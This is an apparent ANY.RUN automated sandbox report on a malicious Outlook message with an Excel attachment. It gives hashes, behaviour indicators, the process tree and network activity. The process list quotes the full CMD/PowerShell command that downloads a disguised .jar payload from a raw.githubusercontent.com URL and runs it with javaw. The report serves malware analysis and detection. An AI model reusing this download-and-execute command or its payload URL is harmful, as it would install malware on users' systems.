analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Administrator Notification_ Redirecting email with malware.msg

Full analysis: https://app.any.run/tasks/23bd7236-6071-4343-8ae5-1fc5385e8882
Verdict: Malicious activity
Analysis date: October 09, 2019, 13:08:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

C4F4B9B591B8F72A0933E2A980858774

SHA1:

6E43807CCA6B51F6FFBD8D4BF5D79237D226E5F6

SHA256:

30E3C0EB8A405B523C59E11E89FFD17C643AFDA375839C985013EAA1F4B20CD1

SSDEEP:

3072:9AEgTcrQVr9O5w52Ai6LXqOnFQi+BHDDD3r:CcMVh5iyXqOqiiDDDb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2572)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2572)
    • Executes PowerShell scripts

      • CMD.EXE (PID: 3084)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2816)
    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 2816)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2816)
      • powershell.exe (PID: 3720)
    • Executes JAVA applets

      • CMD.EXE (PID: 3084)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2572)
      • OUTLOOK.EXE (PID: 2816)
    • Dropped object may contain Bitcoin addresses

      • OUTLOOK.EXE (PID: 2816)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe excel.exe no specs cmd.exe no specs powershell.exe javaw.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2816"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
2572"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3084CMD.EXE /c powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" %tmp%\\I52tGC.jar\") }" & %tmp%\\I52tGC.jarC:\Windows\system32\CMD.EXEEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3720powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" C:\Users\admin\AppData\Local\Temp\\I52tGC.jar\") }" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2760"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\I52tGC.jar" C:\Program Files\Java\jre1.8.0_92\bin\javaw.exeCMD.EXE
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
Total events
2 730
Read events
2 207
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
27
Unknown types
2

Dropped files

PID
Process
Filename
Type
2816OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR2D9E.tmp.cvr
MD5:
SHA256:
2816OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF7E6FE25C82C6FF11.TMP
MD5:
SHA256:
2816OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Siparis (2).xls\:Zone.Identifier:$DATA
MD5:
SHA256:
2572EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRABE6.tmp.cvr
MD5:
SHA256:
3720powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYEKY07DS0869C5OM41U.temp
MD5:
SHA256:
2816OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:74BCA61AB8ED1FA6A3BAFD9A9FCEA026
SHA256:270729F05C7ADE676E89FBD74210D16D8211CFB7CA10E48996E8CB44D179D4DA
3720powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A670ADD3BF0A1901BD12CC7C4CD70086
SHA256:98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986
2816OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Selam ACIL KONTROL EDIN .msgmsg
MD5:1DD951854BB96C71428C29BFF63EF7F1
SHA256:AB45E257547AE621F3EAF931592BA439F2AD2DAE46A82D0C945E87B25DE0F2F6
2816OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_2E25B9F57B733D4499A493454E0F3809.datxml
MD5:EEAA832C12F20DE6AAAA9C7B77626E72
SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16
2816OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Siparis (2).xlstext
MD5:3A8487DA8953DE0A886EC784F2AC5941
SHA256:E0DE585E7C5270C7F36AFC2F013AA5DF64EC507F67C15C912C23B0ACF0EE4845
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3720
powershell.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
2816
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
raw.githubusercontent.com
  • 151.101.0.133
  • 151.101.64.133
  • 151.101.128.133
  • 151.101.192.133
shared

Threats

No threats detected
No debug info